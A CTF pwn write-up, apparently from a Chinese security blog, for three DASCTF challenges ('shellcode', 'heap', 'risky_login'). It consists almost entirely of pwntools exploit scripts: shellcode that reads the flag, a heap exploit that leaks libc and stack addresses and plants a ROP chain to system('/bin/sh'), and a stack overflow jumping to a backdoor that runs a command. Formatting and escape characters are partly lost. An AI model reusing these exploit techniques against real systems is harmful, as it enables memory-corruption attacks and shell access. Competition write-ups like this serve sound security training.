from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = './shellcode'debug = 0ip = 'tcp.cloud.dasctf.com'port = 27552
if debug:    p = process(filename)else:    p  = remote(ip,port)
ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))

def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :   debug_shellcode+ p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
sa(b'[2] Input: (ye / no)n',b'x0fx05')ru(b'[5] ======== Input Your P0P Code ========n')#payload = b'U^S_SX'+b'S'*(0x11-6)payload = b'T^S_Sx58x5ax5ax5cx5ax52'.ljust(0x11,b'x52')#debu('b *$rebase(0x14f2)')s(payload)
shellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.dup2('eax',2)shellcode += shellcraft.read(2,'rsp',0x50)shellcode += shellcraft.dup2(1,3)shellcode += shellcraft.write(3,'rsp',0x50)shellcode += shellcraft.exit(0)shellcode = asm(shellcode)s(b'a'*0x4a+shellcode)inter()

heap

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./heap'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('tcp.cloud.dasctf.com',28834)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc-3.35.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter('Your chocie:nn',a)
    def add(b):      pay=str(1)+' '+b      choice(pay)      def edit(a,b):      pay=str(3)+' '+str(a)+':'+b      choice(pay)
    def show(a):      pay=str(2)+' '+str(a)      choice(pay)
    def delete(a):      pay=str(4)+' '+str(a)      choice(pay)
    for i in range(12):      add('a'*0x50)      edit(i,'a'*0x28+'x55')    sleep(3)    add('a'*0x63)    delete(0)    add('a'*0x62)    edit(12,'a'*0x63)    delete(12)    add('a'*0x58)    sleep(3)    show(12)    io.recvuntil('a'*0x63)    heap_base=u64('x00x00x00'+io.recv(3)+'x00x00')
    io.sendline('')    delete(2)    add('a'*0x62)    edit(0,'a'*0x60+'x6fx0d')    delete(0)    add('a'*0x58)    sleep(3)
    io.sendline('')    delete(6)    add('a'*0x62)    edit(2,'a'*0x60+'xf8x0c')    delete(2)    add('a'*0x58)    sleep(3)    io.sendline('')    edit(3,'a'*9+'x08')    sleep(3)    io.sendline('')
    edit(7,'x09')    sleep(3)    io.sendline('')    edit(3,'a'+p64(heap_base+0x111111))    sleep(3)    io.sendline('')
    edit(7,'x04')    sleep(3)    io.sendline('')    edit(3,'axa0x08')    sleep(3)    show(4)        libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']    libc_base=libc_base&0xfffffffffffff000    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    environ_addr=libc.sym['environ']    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    pop_rax_ret=libc.search(asm('pop rax;ret')).next()    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()    syscall_ret=libc.search(asm('syscall;ret')).next()
    io.sendline('')    edit(7,'x07')    sleep(3)    edit(3,'a'+p64(environ_addr+1))    sleep(3)
    edit(7,'x02')    sleep(3)    edit(3,'a')    sleep(3)
    show(4)    stack_addr=u64(io.recvuntil('x7f')[-6:]+'x00x00')-0x120    io.sendline('')    edit(7,'x07')    sleep(3)    edit(3,'a'+p64(stack_addr))    sleep(3)    edit(4,p64(pop_rdi_ret+1))
    sleep(3)    edit(3,'a'+p64(stack_addr+8))    sleep(3)    edit(4,p64(pop_rdi_ret))
    sleep(3)    edit(3,'a'+p64(stack_addr+0x10))    sleep(3)    edit(4,p64(bin_sh_addr))
    sleep(3)    edit(3,'a'+p64(stack_addr+0x18))    sleep(3)    edit(4,p64(system_addr))
        success('libc_base:'+hex(libc_base))    success('heap_base:'+hex(heap_base))    success('stack_addr:'+hex(stack_addr))
    gdb_attach(io,gdb_text)    io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

risky_login

用ghidra 反编译 RISC-V架构，发现存在栈溢出和后门函数，直接跳转到后门函数执行命令。

from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = ''debug = 0ip = 'tcp.cloud.dasctf.com'port = 29069
if debug:    p = process(filename)else:    p  = remote(ip,port)
ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))

def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :     return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
sla(b'Input ur name:',b'r0ach')payload = b'a'*0x100+p64(0x123456ee)sa(b'Input ur words',payload)sa(b'input what you want exec',b'cat f*')inter()

EDI安全

扫二维码｜关注我们

一个专注渗透实战经验分享的公众号

左青龙
微信扫一扫

右白虎
微信扫一扫

2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC

ctf工控流量题

AVSS 2024 Writeup Polaris战队

2024警察大学第七届精武杯电子数据取证技能比武暨信息安全协会社团邀请赛参考wp

国科ctf python脚本 ctf常用python库

一文入门AndroidCTF：以攻防世界#基础Android为例

BUUCTF--rsa

Omron Fins

工控CTF之协议分析7——OMRON

入坑CTF的第一篇CRC32爆破【MISC】

AliyunCTF 2024 - BadApple

发表评论

在线咨询

微信